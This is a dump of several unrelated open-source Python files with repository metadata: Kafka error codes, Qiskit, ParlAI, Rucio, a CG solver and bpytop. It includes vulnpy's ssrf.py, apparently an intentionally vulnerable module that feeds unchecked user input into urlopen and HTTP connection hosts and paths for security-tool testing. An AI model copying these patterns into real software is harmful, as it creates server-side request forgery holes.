class DelegationTokenExpired(BrokerResponseError):
errno = 66
message = 'DELEGATION_TOKEN_EXPIRED'
description = 'Delegation Token is expired.'
class InvalidPrincipalType(BrokerResponseError):
errno = 67
message = 'INVALID_PRINCIPAL_TYPE'
description = 'Supplied principalType is not supported'
class NonEmptyGroup(BrokerResponseError):
errno = 68
message = 'NON_EMPTY_GROUP'
description = 'The group is not empty'
class GroupIdNotFound(BrokerResponseError):
errno = 69
message = 'GROUP_ID_NOT_FOUND'
description = 'The group id does not exist'
class FetchSessionIdNotFound(BrokerResponseError):
errno = 70
message = 'FETCH_SESSION_ID_NOT_FOUND'
description = 'The fetch session ID was not found'
class InvalidFetchSessionEpoch(BrokerResponseError):
errno = 71
message = 'INVALID_FETCH_SESSION_EPOCH'
description = 'The fetch session epoch is invalid'
class ListenerNotFound(BrokerResponseError):
errno = 72
message = 'LISTENER_NOT_FOUND'
description = (
'There is no listener on the leader broker that matches the'
' listener on which metadata request was processed'
)
def _iter_broker_errors():
for name, obj in inspect.getmembers(sys.modules[__name__]):
if inspect.isclass(obj) and issubclass(obj, BrokerResponseError) and \
obj != BrokerResponseError:
yield obj
kafka_errors = dict([(x.errno, x) for x in _iter_broker_errors()])
def for_code(error_code):
return kafka_errors.get(error_code, UnknownError)
| 29.86215 | 79 | 0.720757 |
ed9046fdb3f832f4d2f80de84558d0259baf482f | 2,027 | py | Python | qiskit/converters/dag_to_circuit.py | romainfd/qiskit-terra | b5285ccc5cb1d17b7c73402833f2750b93652426 | [
"Apache-2.0"
] | null | null | null | qiskit/converters/dag_to_circuit.py | romainfd/qiskit-terra | b5285ccc5cb1d17b7c73402833f2750b93652426 | [
"Apache-2.0"
] | null | null | null | qiskit/converters/dag_to_circuit.py | romainfd/qiskit-terra | b5285ccc5cb1d17b7c73402833f2750b93652426 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2018.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Helper function for converting a dag to a circuit."""
from qiskit.circuit import QuantumCircuit
def dag_to_circuit(dag):
"""Build a ``QuantumCircuit`` object from a ``DAGCircuit``.
Args:
dag (DAGCircuit): the input dag.
Return:
QuantumCircuit: the circuit representing the input dag.
Example:
.. jupyter-execute::
from qiskit import QuantumRegister, ClassicalRegister, QuantumCircuit
from qiskit.dagcircuit import DAGCircuit
from qiskit.converters import circuit_to_dag
from qiskit.circuit.library.standard_gates import CHGate, U2Gate, CXGate
from qiskit.converters import dag_to_circuit
%matplotlib inline
q = QuantumRegister(3, 'q')
c = ClassicalRegister(3, 'c')
circ = QuantumCircuit(q, c)
circ.h(q[0])
circ.cx(q[0], q[1])
circ.measure(q[0], c[0])
circ.rz(0.5, q[1]).c_if(c, 2)
dag = circuit_to_dag(circ)
circuit = dag_to_circuit(dag)
circuit.draw()
"""
name = dag.name or None
circuit = QuantumCircuit(*dag.qregs.values(), *dag.cregs.values(), name=name,
global_phase=dag.global_phase)
for node in dag.topological_op_nodes():
# Get arguments for classical control (if any)
inst = node.op.copy()
inst.condition = node.condition
circuit._append(inst, node.qargs, node.cargs)
return circuit
| 33.229508 | 84 | 0.637889 |
4a01ce0f082c4036e643a52aae0a64ca444f8803 | 15,002 | py | Python | projects/image_chat/transresnet_multimodal/transresnet_multimodal.py | harunpehlivan/ParlAI | e1f2942feb8f158964477f4a46bc2c4c741b2ccd | [
"MIT"
] | 1 | 2019-07-25T17:30:18.000Z | 2019-07-25T17:30:18.000Z | projects/image_chat/transresnet_multimodal/transresnet_multimodal.py | abisee/ParlAI | 5507d4745ca23b23af311673a6b0d1b7e72eb5cd | [
"MIT"
] | null | null | null | projects/image_chat/transresnet_multimodal/transresnet_multimodal.py | abisee/ParlAI | 5507d4745ca23b23af311673a6b0d1b7e72eb5cd | [
"MIT"
] | 1 | 2019-07-28T14:53:18.000Z | 2019-07-28T14:53:18.000Z | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""Transresnet Multimodal Model (https://arxiv.org/abs/1811.00945)."""
from parlai.core.dict import DictionaryAgent
from parlai.core.utils import round_sigfigs
from .modules import TransresnetMultimodalModel
from projects.personality_captions.transresnet.transresnet import TransresnetAgent
import torch
from torch import optim
import random
import os
import numpy as np
import tqdm
from collections import deque
class TransresnetMultimodalAgent(TransresnetAgent):
"""
Model from "Engaging Image Chat: Modeling Personality in Grounded Dialogue".
See paper for more details: (https://arxiv.org/abs/1811.00945)
An extension of the model from https://arxiv.org/abs/1810.10665; given
an image, personality, and dialogue history, predicts the next utterance
in a dialogue.
"""
######################################
# Initialization and argument parsers
######################################
@staticmethod
def add_cmdline_args(argparser):
"""Override to add personality-override option."""
TransresnetMultimodalModel.add_cmdline_args(argparser)
TransresnetAgent.add_cmdline_args(argparser)
arg_group = argparser.add_argument_group("TransresnetMultimodal Arguments")
argparser.add_argument(
"--personality-override",
type=str,
default=None,
help="for use in other tasks where no personality "
"is given. This will give the model a personality "
"(whichever is specifed).",
)
argparser.add_argument(
"--personalities-path",
type=str,
default=None,
help="Path to personalities list",
)
DictionaryAgent.add_cmdline_args(argparser)
return arg_group
def __init__(self, opt, shared=None):
super().__init__(opt, shared)
self.metrics = {
k: {"hits@1/100": 0.0, "loss": 0.0, "num_samples": 0, "med_rank": []}
for k in ["first_round", "second_round", "third_round+"]
}
if shared is None:
self.optimizer = optim.Adam(
filter(lambda p: p.requires_grad, self.model.parameters()),
self.opt["learningrate"],
)
else:
self.optimizer = shared["optimizer"]
self.history = deque(maxlen=None)
self.personality_override = opt.get("personality_override")
def _build_model(self, path=None):
init_model_path = None
if self.opt.get("init_model") and os.path.isfile(self.opt["init_model"]):
init_model_path = self.opt["init_model"]
elif self.opt.get("model_file") and os.path.isfile(self.opt["model_file"]):
init_model_path = self.opt["model_file"]
elif path is not None:
init_model_path = path
print("Creating or loading model")
self.model = TransresnetMultimodalModel(
self.opt, self.personalities_list, self.dict
)
if init_model_path is not None:
self.load(init_model_path)
if self.use_cuda:
self.model.cuda()
def _setup_cands(self):
"""Override for different call to model."""
self.fixed_cands = None
self.fixed_cands_enc = None
if self.fcp is not None:
with open(self.fcp) as f:
self.fixed_cands = [c.replace("\n", "") for c in f.readlines()]
cands_enc_file = "{}.cands_enc".format(self.fcp)
print("loading saved cand encodings")
if os.path.isfile(cands_enc_file):
self.fixed_cands_enc = torch.load(
cands_enc_file, map_location=lambda cpu, _: cpu
)
else:
print("Extracting cand encodings")
self.model.eval()
pbar = tqdm.tqdm(
total=len(self.fixed_cands),
unit="cand",
unit_scale=True,
desc="Extracting candidate encodings",
)
fixed_cands_enc = []
for _, batch in enumerate(
[
self.fixed_cands[i:i + 50]
for i in range(0, len(self.fixed_cands) - 50, 50)
]
):
embedding = self.model.forward_text_encoder(batch).detach()
fixed_cands_enc.append(embedding)
pbar.update(50)
self.fixed_cands_enc = torch.cat(fixed_cands_enc, 0)
torch.save(self.fixed_cands_enc, cands_enc_file)
def share(self):
"""Override to share optimizer."""
shared = super().share()
shared["optimizer"] = self.optimizer
return shared
def observe(self, observation):
"""
Observe an observation.
Additionally retrieves the dialogue history for the observation.
:param observation:
observation
:return:
the observation, with dialogue history included.
"""
self.observation = self.get_dialogue_history(observation)
return self.observation
def train_step(self, valid_obs, image_feats, personalities, dialogue_histories):
"""
Model train step.
:param valid_obs:
list of valid observations
:param image_feats:
list of image features, one per example
:param personalities:
list of personalities, one per example
:param dialogue_histories:
list of dialogue histories, one per example
:return:
the total loss and the number of correct examples
"""
self.model.train()
labels = [random.choice(v["labels"]) for v in valid_obs]
loss, num_correct, _ = self.model(
image_feats,
personalities,
dialogue_histories,
labels,
batchsize=len(valid_obs),
)
return loss, num_correct
def eval_step(self, valid_obs, image_feats, personalities, dialogue_histories):
"""
Model eval step.
:param valid_obs:
list of valid observations
:param image_feats:
list of image features, one per example
:param personalities:
list of personalities, one per example
:param dialogue_histories:
list of dialogue histories, one per example
:return:
the total loss, number of correct examples,
the ranked position of each correct caption,
and the ranked lists of candidates (one per example)
"""
self.model.eval()
med_rank = None
chosen_responses = None
candidates_encoded = None
if self.fixed_cands is not None:
candidates_encoded = self.fixed_cands_enc
candidates = self.fixed_cands
else:
candidates = [v["label_candidates"] for v in valid_obs]
chosen_responses = self.model.choose_best_response(
image_feats,
personalities,
dialogue_histories,
candidates,
candidates_encoded=candidates_encoded,
k=-1 if self.fixed_cands is None else 100,
batchsize=len(valid_obs),
)
loss = -1
if self.fixed_cands is not None:
num_correct = 0
else:
labels = [v.get("eval_labels") for v in valid_obs]
equality_list = [
1 if chosen_responses[i][0] in labels[i] else 0
for i in range(len(labels))
]
# calculate med ranks
med_rank = []
for i, e_list in enumerate(chosen_responses):
lowest_rank = len(e_list) + 1
for c in labels[i]:
lowest_rank = min(lowest_rank, e_list.index(c) + 1)
med_rank.append(lowest_rank)
num_correct = sum(equality_list)
return loss, num_correct, med_rank, chosen_responses
def batch_act(self, observations):
"""
Act on a batch of observations.
:param observations:
list of observations
:return:
A list of acts, one for each observation
"""
is_training = any(["labels" in obs for obs in observations])
valid_obs, valid_indexes = self.filter_valid_obs(observations, is_training)
image_feats = self.extract_image_feats(valid_obs)
personalities, dialogue_histories, dialogue_round = self.extract_texts(
valid_obs
)
chosen_responses = None
med_rank = None
if is_training:
self.optimizer.zero_grad()
loss, num_correct = self.train_step(
valid_obs, image_feats, personalities, dialogue_histories
)
loss.backward()
self.optimizer.step()
else:
loss, num_correct, med_rank, chosen_responses = self.eval_step(
valid_obs, image_feats, personalities, dialogue_histories
)
self.update_metrics(loss, num_correct, len(valid_obs), dialogue_round, med_rank)
result = [
{"text": "No Response During Traiing", "id": self.getID()}
for _ in range(len(observations))
]
if chosen_responses is not None:
for i, index_obs in enumerate(valid_indexes):
result[index_obs]["text"] = chosen_responses[i][0]
result[index_obs]["text_candidates"] = chosen_responses[i]
return result
def extract_texts(self, obs):
"""
Extract the personalities and dialogue histories from observations.
Additionally determine which dialogue round we are in.
Note that this function assumes that the personality is the
last line of the `text` field in the observation.
:param obs:
list of observations
:return:
a list of personalities, a list of dialogue histories, and the
current dialogue round (either first, second, or third+)
"""
splits = [v.get("text").split("\n") for v in obs]
if self.personality_override:
splits = [s + [self.personality_override] for s in splits]
personalities = [t[-1] for t in splits]
dialogue_histories = None
dialogue_round = "first_round"
if len(splits[0]) >= 2:
dialogue_round = "second_round" if len(splits[0]) == 2 else "third_round+"
dialogue_histories = ["\n".join(t[:-1]) for t in splits]
return personalities, dialogue_histories, dialogue_round
def get_dialogue_history(self, obs):
"""
Get dialogue history for an observation.
:param obs:
observation
:return:
the observation with the dialogue history in the `text` field
"""
if len(self.history) > 0:
obs["text"] = "\n".join(self.history) + "\n" + obs["text"]
if "labels" in obs:
self.history.append(random.choice(obs["labels"]))
elif "eval_labels" in obs:
self.history.append(random.choice(obs["eval_labels"]))
if obs.get("episode_done", True):
# end of this episode, clear the history
self.history.clear()
return obs
def update_metrics(
self, loss, num_correct, num_samples, dialogue_round, med_rank=None
):
"""
Update Metrics.
Overriden to include dialogue round
:param loss:
float loss
:param num_correct:
number of examples for which chosen caption is correct
:param num_samples:
total number of examples
:param med_rank:
rank of correct caption for each example
"""
self.metrics[dialogue_round]["hits@1/100"] += num_correct
self.metrics[dialogue_round]["loss"] += loss
self.metrics[dialogue_round]["num_samples"] += num_samples
if med_rank:
self.metrics[dialogue_round]["med_rank"] += med_rank
def receive_metrics(self, metrics_dict):
"""
Receive the metrics from validation.
Unfreeze text encoder weights after a certain number of rounds without improvement.
Override to account for different dialogue rounds.
:param metrics_dict:
the metrics dictionary
"""
if "tasks" in metrics_dict:
metrics_dict = metrics_dict["tasks"]["internal:comment_battle:imageDialog"]
if self.freeze_patience != -1 and self.is_frozen:
m_key = "hits@1/100"
ms = [
metrics_dict[r].get(m_key, -1)
for r in ["first_round", "second_round", "third_round+"]
]
m = sum(ms) / len([m for m in ms if m >= 0])
if m > self.freeze_best_metric:
self.freeze_impatience = 0
self.freeze_best_metric = m
print("performance not good enough to unfreeze the model.")
else:
self.freeze_impatience += 1
print("Growing impatience for unfreezing")
if self.freeze_impatience >= self.freeze_patience:
self.is_frozen = False
print(
"Reached impatience for fine tuning. "
"Reloading the best model so far."
)
self._build_model(self.model_file)
if self.use_cuda:
self.model = self.model.cuda()
print("Unfreezing.")
self.model.unfreeze_text_encoder()
print("Done")
def reset(self):
"""Override to reset dialogue history."""
super().reset()
self.history.clear()
def reset_metrics(self):
"""Reset per-dialogue round metrics."""
for v in self.metrics.values():
v["hits@1/100"] = 0.0
v["loss"] = 0.0
v["num_samples"] = 0.0
if "med_rank" in v:
v["med_rank"] = []
def report(self):
"""Report per-dialogue round metrics."""
m = {k: {} for k in ["first_round", "second_round", "third_round+"]}
for k, v in self.metrics.items():
if v["num_samples"] > 0:
m[k]["hits@1/100"] = round_sigfigs(
v["hits@1/100"] / v["num_samples"], 4
)
m[k]["loss"] = round_sigfigs(v["loss"] / v["num_samples"], 4)
if "med_rank" in v:
m[k]["med_rank"] = np.median(v["med_rank"])
return m
| 35.804296 | 91 | 0.571724 |
8cc86864d54ff32def0d2c405eac9387d5e6c3d3 | 3,888 | py | Python | src/vulnpy/trigger/ssrf.py | lostsnow/vulnpy | ebdba9658b38f6282dffaf02286c3460a28a7afe | [
"MIT"
] | null | null | null | src/vulnpy/trigger/ssrf.py | lostsnow/vulnpy | ebdba9658b38f6282dffaf02286c3460a28a7afe | [
"MIT"
] | 1 | 2022-02-07T07:43:35.000Z | 2022-02-07T07:43:35.000Z | src/vulnpy/trigger/ssrf.py | lostsnow/vulnpy | ebdba9658b38f6282dffaf02286c3460a28a7afe | [
"MIT"
] | 1 | 2022-01-12T02:50:14.000Z | 2022-01-12T02:50:14.000Z | """
In PY3, urllib2 was ported mostly to urllib.request.
The original PY2 urllib module is unique to PY2.
In this module, we use urllib2 and urllib.request methods
interchangeably depending on the version of python. We refer
to the original PY2 urllib module as "legacy".
"""
import io
import mock
import os
from urllib.request import Request, urlopen
from http.client import HTTPConnection, HTTPSConnection
legacy_urlopen = urlopen
EXCEPTION_CODE = -100
TRUSTED_HOST = "example.com"
TRUSTED_METHOD = "GET"
TRUSTED_URL = "/"
def mock_connection(func):
"""
Mock out socket connections for SSRF unless we see the
VULNPY_REAL_SSRF_REQUESTS environment variable. This should
only be used when vulnpy is being stood up as a real webapp.
For unit testing with vulnpy, it's probably best to use the
default behavior to avoid overloading some third-party server.
"""
def wrapper(*args):
if os.environ.get("VULNPY_REAL_SSRF_REQUESTS"):
return func(*args)
mock_socket = mock.MagicMock()
mock_socket.makefile.return_value = io.BytesIO(b"HTTP/1.1 200 OK")
with mock.patch("socket.create_connection", return_value=mock_socket):
return func(*args)
return wrapper
@mock_connection
def _urlopen(urlopen_func, arg):
try:
return urlopen_func(arg).getcode()
except Exception:
return EXCEPTION_CODE
def do_legacy_urlopen(user_input):
"""
PY2: urllib.urlopen
PY3: urllib.request.urlopen (fallback only, not intended for use)
"""
return _urlopen(legacy_urlopen, user_input)
def do_urlopen_str(user_input):
"""
PY2: urllib2.urlopen
PY3: urllib.request.urlopen
"""
return _urlopen(urlopen, user_input)
def do_urlopen_obj(user_input):
"""
Same as urlopen_str, but first creates a request object.
"""
try:
req = Request(user_input)
except Exception:
req = None
return _urlopen(urlopen, req)
@mock_connection
def _request(user_input, connection_class, method_name, vulnerable_url):
try:
c = connection_class(TRUSTED_HOST)
request_method = getattr(c, method_name)
if vulnerable_url:
request_method(TRUSTED_METHOD, user_input)
else:
request_method(user_input, TRUSTED_URL)
if method_name == "putrequest":
c.endheaders()
return c.getresponse().status
except Exception:
return EXCEPTION_CODE
def do_httpconnection_request_url(user_input):
return _request(user_input, HTTPConnection, "request", True)
def do_httpconnection_request_method(user_input):
return _request(user_input, HTTPConnection, "request", False)
def do_httpconnection_putrequest_url(user_input):
return _request(user_input, HTTPConnection, "putrequest", True)
def do_httpconnection_putrequest_method(user_input):
return _request(user_input, HTTPConnection, "putrequest", False)
def do_httpsconnection_request_url(user_input):
return _request(user_input, HTTPSConnection, "request", True)
def do_httpsconnection_request_method(user_input):
return _request(user_input, HTTPSConnection, "request", False)
def do_httpsconnection_putrequest_url(user_input):
return _request(user_input, HTTPSConnection, "putrequest", True)
def do_httpsconnection_putrequest_method(user_input):
return _request(user_input, HTTPSConnection, "putrequest", False)
@mock_connection
def _request_init(user_input, connection_class):
try:
c = connection_class(user_input)
c.request(TRUSTED_METHOD, TRUSTED_URL)
return c.getresponse().status
except Exception:
return EXCEPTION_CODE
def do_httpconnection_init(user_input):
return _request_init(user_input, HTTPConnection)
def do_httpsconnection_init(user_input):
return _request_init(user_input, HTTPSConnection)
| 26.09396 | 78 | 0.729424 |
b08a53f8f2cca5db35c0a916d013c15bb78601ae | 11,815 | py | Python | lib/rucio/client/ruleclient.py | mageirakos/rucio | d783ab74bc8d398656e98253ab2547de1f120ea9 | [
"Apache-2.0"
] | null | null | null | lib/rucio/client/ruleclient.py | mageirakos/rucio | d783ab74bc8d398656e98253ab2547de1f120ea9 | [
"Apache-2.0"
] | null | null | null | lib/rucio/client/ruleclient.py | mageirakos/rucio | d783ab74bc8d398656e98253ab2547de1f120ea9 | [
"Apache-2.0"
] | null | null | null | # Copyright 2013-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Martin Barisits <martin.barisits@cern.ch>, 2013-2018
# - Vincent Garonne <vgaronne@gmail.com>, 2013-2018
# - Cedric Serfon <cedric.serfon@cern.ch>, 2014-2015
# - Ralph Vigne <ralph.vigne@cern.ch>, 2015
# - Joaquin Bogado <jbogado@linti.unlp.edu.ar>, 2018
#
# PY3K COMPATIBLE
try:
from urllib import quote_plus
except ImportError:
from urllib.parse import quote_plus
from json import dumps, loads
from requests.status_codes import codes
from rucio.client.baseclient import BaseClient
from rucio.client.baseclient import choice
from rucio.common.utils import build_url
class RuleClient(BaseClient):
"""RuleClient class for working with replication rules"""
RULE_BASEURL = 'rules'
def __init__(self, rucio_host=None, auth_host=None, account=None, ca_cert=None, auth_type=None, creds=None, timeout=600, dq2_wrapper=False):
super(RuleClient, self).__init__(rucio_host, auth_host, account, ca_cert, auth_type, creds, timeout, dq2_wrapper)
def add_replication_rule(self, dids, copies, rse_expression, weight=None, lifetime=None, grouping='DATASET', account=None,
locked=False, source_replica_expression=None, activity=None, notify='N', purge_replicas=False,
ignore_availability=False, comment=None, ask_approval=False, asynchronous=False, priority=3,
meta=None):
"""
:param dids: The data identifier set.
:param copies: The number of replicas.
:param rse_expression: Boolean string expression to give the list of RSEs.
:param weight: If the weighting option of the replication rule is used, the choice of RSEs takes their weight into account.
:param lifetime: The lifetime of the replication rules (in seconds).
:param grouping: ALL - All files will be replicated to the same RSE.
DATASET - All files in the same dataset will be replicated to the same RSE.
NONE - Files will be completely spread over all allowed RSEs without any grouping considerations at all.
:param account: The account owning the rule.
:param locked: If the rule is locked, it cannot be deleted.
:param source_replica_expression: RSE Expression for RSEs to be considered for source replicas.
:param activity: Transfer Activity to be passed to FTS.
:param notify: Notification setting for the rule (Y, N, C).
:param purge_replicas: When the rule gets deleted purge the associated replicas immediately.
:param ignore_availability: Option to ignore the availability of RSEs.
:param ask_approval: Ask for approval of this replication rule.
:param asynchronous: Create rule asynchronously by judge-injector.
:param priority: Priority of the transfers.
:param comment: Comment about the rule.
:param meta: Metadata, as dictionary.
"""
path = self.RULE_BASEURL + '/'
url = build_url(choice(self.list_hosts), path=path)
# TODO remove the subscription_id from the client; It will only be used by the core;
data = dumps({'dids': dids, 'copies': copies, 'rse_expression': rse_expression,
'weight': weight, 'lifetime': lifetime, 'grouping': grouping,
'account': account, 'locked': locked, 'source_replica_expression': source_replica_expression,
'activity': activity, 'notify': notify, 'purge_replicas': purge_replicas,
'ignore_availability': ignore_availability, 'comment': comment, 'ask_approval': ask_approval,
'asynchronous': asynchronous, 'priority': priority, 'meta': meta})
r = self._send_request(url, type='POST', data=data)
if r.status_code == codes.created:
return loads(r.text)
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def delete_replication_rule(self, rule_id, purge_replicas=None):
"""
Deletes a replication rule and all associated locks.
:param rule_id: The id of the rule to be deleted
:param purge_replicas: Immediately delete the replicas.
:raises: RuleNotFound, AccessDenied
"""
path = self.RULE_BASEURL + '/' + rule_id
url = build_url(choice(self.list_hosts), path=path)
data = dumps({'purge_replicas': purge_replicas})
r = self._send_request(url, type='DEL', data=data)
if r.status_code == codes.ok:
return True
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def get_replication_rule(self, rule_id, estimate_ttc=False):
"""
Get a replication rule.
:param rule_id: The id of the rule to be retrieved.
:param estimate_ttc: bool, if rule_info should return ttc information
:raises: RuleNotFound
"""
path = self.RULE_BASEURL + '/' + rule_id
url = build_url(choice(self.list_hosts), path=path)
data = dumps({'estimate_ttc': estimate_ttc})
r = self._send_request(url, type='GET', data=data)
if r.status_code == codes.ok:
return next(self._load_json_data(r))
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def update_replication_rule(self, rule_id, options):
"""
:param rule_id: The id of the rule to be retrieved.
:param options: Options dictionary.
:raises: RuleNotFound
"""
path = self.RULE_BASEURL + '/' + rule_id
url = build_url(choice(self.list_hosts), path=path)
data = dumps({'options': options})
r = self._send_request(url, type='PUT', data=data)
if r.status_code == codes.ok:
return True
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def reduce_replication_rule(self, rule_id, copies, exclude_expression=None):
"""
:param rule_id: Rule to be reduced.
:param copies: Number of copies of the new rule.
:param exclude_expression: RSE Expression of RSEs to exclude.
:raises: RuleReplaceFailed, RuleNotFound
"""
path = self.RULE_BASEURL + '/' + rule_id + '/reduce'
url = build_url(choice(self.list_hosts), path=path)
data = dumps({'copies': copies, 'exclude_expression': exclude_expression})
r = self._send_request(url, type='POST', data=data)
if r.status_code == codes.ok:
return loads(r.text)
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def move_replication_rule(self, rule_id, rse_expression):
"""
Move a replication rule to another RSE and, once done, delete the original one.
:param rule_id: Rule to be moved.
:param rse_expression: RSE expression of the new rule.
:raises: RuleNotFound, RuleReplaceFailed
"""
path = self.RULE_BASEURL + '/' + rule_id + '/move'
url = build_url(choice(self.list_hosts), path=path)
data = dumps({'rule_id': rule_id, 'rse_expression': rse_expression})
r = self._send_request(url, type='POST', data=data)
if r.status_code == codes.created:
return loads(r.text)
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def approve_replication_rule(self, rule_id):
"""
:param rule_id: Rule to be approved.
:raises: RuleNotFound
"""
path = self.RULE_BASEURL + '/' + rule_id
url = build_url(choice(self.list_hosts), path=path)
data = dumps({'options': {'approve': True}})
r = self._send_request(url, type='PUT', data=data)
if r.status_code == codes.ok:
return True
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def deny_replication_rule(self, rule_id):
"""
:param rule_id: Rule to be denied.
:raises: RuleNotFound
"""
path = self.RULE_BASEURL + '/' + rule_id
url = build_url(choice(self.list_hosts), path=path)
data = dumps({'options': {'approve': False}})
r = self._send_request(url, type='PUT', data=data)
if r.status_code == codes.ok:
return True
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def list_replication_rule_full_history(self, scope, name):
"""
List the rule history of a DID.
:param scope: The scope of the DID.
:param name: The name of the DID.
"""
path = '/'.join([self.RULE_BASEURL, quote_plus(scope), quote_plus(name), 'history'])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type='GET')
if r.status_code == codes.ok:
return self._load_json_data(r)
exc_cls, exc_msg = self._get_exception(r.headers, r.status_code)
raise exc_cls(exc_msg)
def examine_replication_rule(self, rule_id):
"""
Examine a replication rule for errors during transfer.
:param rule_id: Rule to be denied.
:raises: RuleNotFound
"""
path = self.RULE_BASEURL + '/' + rule_id + '/analysis'
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type='GET')
if r.status_code == codes.ok:
return next(self._load_json_data(r))
exc_cls, exc_msg = self._get_exception(r.headers, r.status_code)
raise exc_cls(exc_msg)
def list_replica_locks(self, rule_id):
"""
List details of all replica locks for a rule.
:param rule_id: Rule to be denied.
:raises: RuleNotFound
"""
path = self.RULE_BASEURL + '/' + rule_id + '/locks'
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type='GET')
if r.status_code == codes.ok:
return self._load_json_data(r)
exc_cls, exc_msg = self._get_exception(r.headers, r.status_code)
raise exc_cls(exc_msg)
| 47.26 | 151 | 0.620652 |
dfb97bec15ebde74e8a91f92daea8efc241db44a | 1,410 | py | Python | parla/comps/determiter/pcg.py | rileyjmurray/parla | b1f638cb60913c98c75fd721ca002521344fc3cf | [
"BSD-3-Clause"
] | 6 | 2021-12-07T16:52:26.000Z | 2022-03-10T15:35:02.000Z | parla/comps/determiter/pcg.py | rileyjmurray/parla | b1f638cb60913c98c75fd721ca002521344fc3cf | [
"BSD-3-Clause"
] | 1 | 2022-01-12T20:30:38.000Z | 2022-01-12T23:04:34.000Z | parla/comps/determiter/pcg.py | rileyjmurray/parla | b1f638cb60913c98c75fd721ca002521344fc3cf | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
import scipy.linalg as la
def pcg(mv_mat, rhs, mv_pre, iter_lim, tol, x0):
# mv_mat is a function handle, representing mv_mat(vec) = mat @ vec
# for a positive definite matrix mat.
#
# Use PCG to solve mat @ x == rhs.
#
# mv_pre is a function handle, representing mv_pre(vec) = M @ M.T @ vec
# where M.T @ mat @ M is a better-conditioned positive definite matrix than mat.
#
# residuals[i] is the error ||mat x - rhs||_2^2 at iteration i.
x = x0.copy()
residuals = -np.ones(iter_lim)
r = rhs - mv_mat(x)
d = mv_pre(r)
delta1_old = np.dot(r, d)
delta1_new = delta1_old
cur_err = la.norm(r)
rel_tol = tol * cur_err
i = 0
while i < iter_lim and cur_err > rel_tol:
# TODO: provide the option of recording || r ||_2^2, not just ||M' r||_2^2.
#residuals[i] = delta1_old
residuals[i] = cur_err
q = mv_mat(d)
den = np.dot(d, q) # equal to d'*mat*d
alpha = delta1_new / den
x += alpha * d
if i % 10 == 0:
r = rhs - mv_mat(x)
else:
r -= alpha * q
cur_err = la.norm(r)
s = mv_pre(r)
delta1_old = delta1_new
delta1_new = np.dot(r, s) # equal to ||M'r||_2^2.
beta = delta1_new / delta1_old
d = s + beta * d
i += 1
residuals = residuals[:i]
return x, residuals
| 29.375 | 84 | 0.551064 |
2ebf9fa7dfb072c0f8cdd90788adbd199305d280 | 213,810 | py | Python | bpytop.py | caughtquick/bpytop | 56f80fcf3258008e302a28d7bab93fdf3238c007 | [
"Apache-2.0"
] | null | null | null | bpytop.py | caughtquick/bpytop | 56f80fcf3258008e302a28d7bab93fdf3238c007 | [
"Apache-2.0"
] | null | null | null | bpytop.py | caughtquick/bpytop | 56f80fcf3258008e302a28d7bab93fdf3238c007 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# pylint: disable=not-callable, no-member, unsubscriptable-object
# indent = tab
# tab-size = 4
# Copyright 2021 Aristocratos (jakob@qvantnet.com)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, sys, io, threading, signal, re, subprocess, logging, logging.handlers, argparse
import urllib.request
from time import time, sleep, strftime
from datetime import timedelta
from _thread import interrupt_main
from collections import defaultdict
from select import select
from distutils.util import strtobool
from string import Template
from math import ceil, floor
from random import randint
from shutil import which
from typing import List, Dict, Tuple, Union, Any, Iterable
errors: List[str] = []
try: import fcntl, termios, tty, pwd
except Exception as e: errors.append(f'{e}')
try: import psutil # type: ignore
except Exception as e: errors.append(f'{e}')
SELF_START = time()
SYSTEM: str
if "linux" in sys.platform: SYSTEM = "Linux"
elif "bsd" in sys.platform: SYSTEM = "BSD"
elif "darwin" in sys.platform: SYSTEM = "MacOS"
else: SYSTEM = "Other"
if errors:
print("ERROR!")
print("\n".join(errors))
if SYSTEM == "Other":
print("\nUnsupported platform!\n")
else:
print("\nInstall required modules!\n")
raise SystemExit(1)
VERSION: str = "1.0.65"
#? Argument parser ------------------------------------------------------------------------------->
args = argparse.ArgumentParser()
args.add_argument("-b", "--boxes", action="store", dest="boxes", help = "which boxes to show at start, example: -b \"cpu mem net proc\"")
